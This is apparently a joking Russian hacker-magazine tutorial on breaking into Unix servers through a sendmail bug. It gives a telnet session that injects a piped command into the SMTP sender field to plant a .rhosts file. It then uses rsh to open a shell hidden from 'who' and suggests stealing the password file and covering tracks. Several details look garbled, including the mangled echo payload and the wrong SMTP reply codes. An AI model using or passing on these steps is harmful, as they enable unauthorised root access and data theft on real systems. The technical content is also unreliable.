Здравствуйте, дорогие мальчики
и девочки. Что? Уже не девочки? Понятно, извиняюсь...
Сейчас я раскажу вам сказочку... Хотя о чем это я?
Ну да ладно...

Многие уважающие себя люди,
хоть как-то знакомые с интернетом, знают, что
большая часть web-серваков построена на базе
всяких там юниксов и линуксов. И построена не зря.
Эти ОСи, в отличии от виндов глючат не при первом
попавшемся случае и сломать их достаточно сложно
из-за малого количества дырок. Именно из-за
малого; но дырки все-таки присутствуют, т.к.
безглючных операционок существовать не может (даже
у людей дырки есть. Целых семь! На досуге
пересчитай, все-ли целы - ничё там не заросло :))? Ну
вот одну из таких дыр (да не в тебе, а в web-серваках
на юнихе) мы сейчас и рассмотрим...

Вскрытие

Ты когда нибудь е-мылом
пользовался? Ну так вот, твой вампирыч, когда
отсылает почту, первым делом подсединяется к
серваку и передает твою интимную переписку с
хакершей Соней из города Мухосранска  такой
проге под названием sendmail. Эта программа
задумывалась как служебная утилита и вошла во
многие дистрибутивы юникс-систем. Но в одной из
версий этой проги есть досадный баг, при
активизации которого сендмейл вываливается в
шелл с правами root'а. Ну вот в принципе-то и всё.
Теоретическая часть закончена, приступаем к
водным процедурам :). Инструментом для взлома нам
будет служить программа, входящая в стандартный
пакет поставки виндов, называется telnet. Вот её и
возьмем. Подключившись к взламываемой машине,
проделываем нижеописанные незамысловатые
действия: (после точки с запятой идут комментарии)

Ампутация

telnet lamer.com 25 - телнетимся на
25 smtp порт
Connecting to 123.123.123.123.
220 sendmail SMI/4.3.5.2 ready
helo xxx  - здрасьте, здрасьте, коли не шутите...
220 Helo xxx, ( hacker.com )
mail from: |echo hacker.com/.rhosts@lamer.com
- подставляем команду вместо обратного адреса.
200 Sender ok.
rcpt to: vasya_pupkin_v_gostyah_u_prababushki@lamer.com
- вводим заранее неправильного адресата
500 vasya_pupkin_v_gostyah_u_prababushki@lamer.com: user unknown - не
обращая внимания на визги, продолжаем...
data
230 Enter mail, end with .
200 Mail accepted - трандец.... Готово, сломали!
quit

А теперь заходим так, чтобы нас
не было видно через who

# rsh target.remote.com /bin/csh -i
Welcome to remote.com!
Warning! No access to terminal, job control disabled!
target#

Всё, сендмейл в шелле, можешь спокойно и неторопливо трахать машину. Для примера можно утянуть файл с паролями, а можно
придумать что-то более (экзо\эро)тичное. Всё
ограничивается только твоей извращенской
фантазией. Но в случае, если ты ломаешь что-то
сверхзащищенное, то не забудь замести следы, а то
прийдут добрые дяди из ФСБ и... (Тут запись
обрывается. В результате экспертизы Х на стоящем
на полу магнитофоне будут обнаружены шаги, слова:
"откройте, милиция", крики о помощи и
выстрелы. На полу обнаружена кровь, а автор
вообще не обнаружен).

Check Also

DDoS на Bluetooth. Разбираем трюк, который поможет отключить чужую колонку

На свете существует не так много вещей, которые бесят практически всех без исключения. Это…

Оставить мнение